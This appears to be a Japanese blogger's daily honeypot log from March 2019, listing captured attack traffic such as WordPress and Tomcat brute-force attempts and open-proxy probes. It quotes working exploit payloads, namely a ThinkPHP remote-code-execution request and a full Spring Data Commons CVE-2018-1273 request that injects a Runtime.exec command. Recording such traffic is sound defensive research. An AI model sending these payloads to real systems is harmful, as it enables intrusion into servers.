WOWHoneypot観察(12日目)
2019/03/28(木)
今日はJC3 Forum 2019に参加してきました。
今年は他にも色々なセミナーやカンファレンスに参加したいですね。
トータルは1525件でした。
件数 | 概要 | リクエスト |
---|---|---|
1000 | Tomcat管理ページへ対するブルートフォース攻撃 | GET /manager/html |
59 | 第三者中継攻撃 | CONNECT www.google.com:80 |
55 | アクセス | GET / |
15 | 第三者中継攻撃 | GET http[:]//domkrim[.]com/av.php |
13 | 第三者中継攻撃 | GET http[:]//blueforestdigital[.]com/azz/azz.php |
12 | 第三者中継攻撃 | GET http[:]//ilich[.]in[.]ua/image_add/useful_pictures/_%28260x131%29_4f475e3eb2cb1.php |
10 | WordPressのブルートフォース攻撃 | GET /wp-login.php |
9 | WordPressのブルートフォース攻撃 | POST /wp/wp-login.php |
9 | WordPressのブルートフォース攻撃 | POST /wp-login.php |
9 | WordPressのブルートフォース攻撃 | POST /site/wp-login.php |
9 | WordPressのブルートフォース攻撃 | POST /myforum/wp-login.php |
9 | 第三者中継攻撃 | GET http[:]//www[.]ejiar[.]cn/ |
9 | 第三者中継攻撃 | GET http[:]//mojeip[.]net[.]pl/asdfa/azenv.php |
9 | WordPressのブルートフォース攻撃 | GET /wp/wp-login.php |
9 | WordPressのブルートフォース攻撃 | GET /site/wp-login.php |
9 | WordPressのブルートフォース攻撃 | GET /myforum/wp-login.php |
9 | WordPressのブルートフォース攻撃 | GET /myblog/wp-login.php |
8 | WordPressのブルートフォース攻撃 | POST /myblog/wp-login.php |
7 | WordPressのブルートフォース攻撃 | POST /wp1/wp-login.php |
7 | WordPressのブルートフォース攻撃 | POST /teststite/wp-login.php |
7 | WordPressのブルートフォース攻撃 | POST /testblog/wp-login.php |
7 | WordPressのブルートフォース攻撃 | POST /mysite/wp-login.php |
7 | WordPressのブルートフォース攻撃 | POST /forum/wp-login.php |
7 | WordPressのブルートフォース攻撃 | POST /2017/wp-login.php |
7 | WordPressのブルートフォース攻撃 | POST /1/wp-login.php |
7 | WordPressのブルートフォース攻撃 | GET /wp1/wp-login.php |
7 | WordPressのブルートフォース攻撃 | GET /wordpress/wp-login.php |
7 | WordPressのブルートフォース攻撃 | GET /teststite/wp-login.php |
7 | WordPressのブルートフォース攻撃 | GET /testblog/wp-login.php |
7 | WordPressのブルートフォース攻撃 | GET /mysite/wp-login.php |
7 | WordPressのブルートフォース攻撃 | GET /forum/wp-login.php |
7 | WordPressのブルートフォース攻撃 | GET /2017/wp-login.php |
7 | WordPressのブルートフォース攻撃 | GET /1/wp-login.php |
6 | WordPressのブルートフォース攻撃 | POST /wordpress/wp-login.php |
6 | WordPressのブルートフォース攻撃 | POST /news/wp-login.php |
6 | WordPressのブルートフォース攻撃 | POST /info/wp-login.php |
6 | WordPressのブルートフォース攻撃 | POST /blog/wp-login.php |
6 | WordPressのブルートフォース攻撃 | POST /2019/wp-login.php |
6 | WordPressのブルートフォース攻撃 | GET /news/wp-login.php |
6 | WordPressのブルートフォース攻撃 | GET /info/wp-login.php |
6 | WordPressのブルートフォース攻撃 | GET /blog/wp-login.php |
6 | WordPressのブルートフォース攻撃 | GET /2019/wp-login.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /xmlrpc.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wp/xmlrpc.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /teststite/xmlrpc.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /testblog/xmlrpc.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /site/xmlrpc.php |
5 | WordPressのブルートフォース攻撃 | POST /shop/wp-login.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /mysite/xmlrpc.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /myforum/xmlrpc.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /myblog/xmlrpc.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /2017/xmlrpc.php |
5 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /1/xmlrpc.php |
5 | WordPressのブルートフォース攻撃 | GET /shop/wp-login.php |
4 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wordpress/xmlrpc.php |
4 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /news/xmlrpc.php |
4 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /info/xmlrpc.php |
4 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /blog/xmlrpc.php |
4 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /2019/xmlrpc.php |
3 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /wp1/xmlrpc.php |
3 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /shop/xmlrpc.php |
3 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /forum/xmlrpc.php |
2 | ThinkPHPの脆弱性を狙った攻撃 | POST /TP/public/index.php?s=captcha |
2 | ThinkPHPの脆弱性を狙った攻撃 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った攻撃 | GET /TP/public/index.php |
1 | Tomcatの脆弱性を狙った攻撃 | PUT /FxCodeShell.jsp%20 |
1 | Spring Data Commonsの脆弱性(CVE-2018-1273)を狙った通信 | POST /users?page=&size=5 |
1 | 第三者中継攻撃 | GET http[:]//www[.]baidu[.]com/?rands=_11164641108469602459472 |
1 | 第三者中継攻撃 | GET http[:]//fr[.]cyberpods[.]net/index.php?app=public&mod=Profile&act=index&uid=1812 |
1 | 第三者中継攻撃 | GET http[:]//157.52.156[.]49:42788/vs.php?rands=_708832378423722249312 |
1 | 第三者中継攻撃 | GET http[:]//104.148.42[.]211:42788/gvs.php?rands=_324548939810531081253760 |
1 | 不明 | GET /about/version |
1 | WordPressの調査 | GET ///wp-json/wp/c/ |
1 | WordPressの調査 | GET ///?author=1 |
今日はWordPress関連が多いですね。
Spring Data Commonsの脆弱性(CVE-2018-1273)を狙った通信を初めて観測しました。
OSコマンドインジェクションの類なんですね。
POST /users?page=&size=5
内容は以下でした。
POST /users?page=&size=5 HTTP/1.1
Host: ***.***.***.***:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipusername[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=
一件わからないものがありました。。。
ただの調査なのかな?
わかる方いたら教えていただきたいです。。
GET /about/version
GET /about/version HTTP/1.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36Accept: */*
参考URL
調査にあたり参考にさせていただきました。ありがとうございます。
ハニーポット観察記録(24) at www.morihi-soc.net
ハニーポット観察日記(2019/02/18) - cute_otter’s blog
Spring Data Commonsにおける任意コード実行の脆弱性(CVE-2018-1273) | リクルートテクノロジーズ メンバーズブログ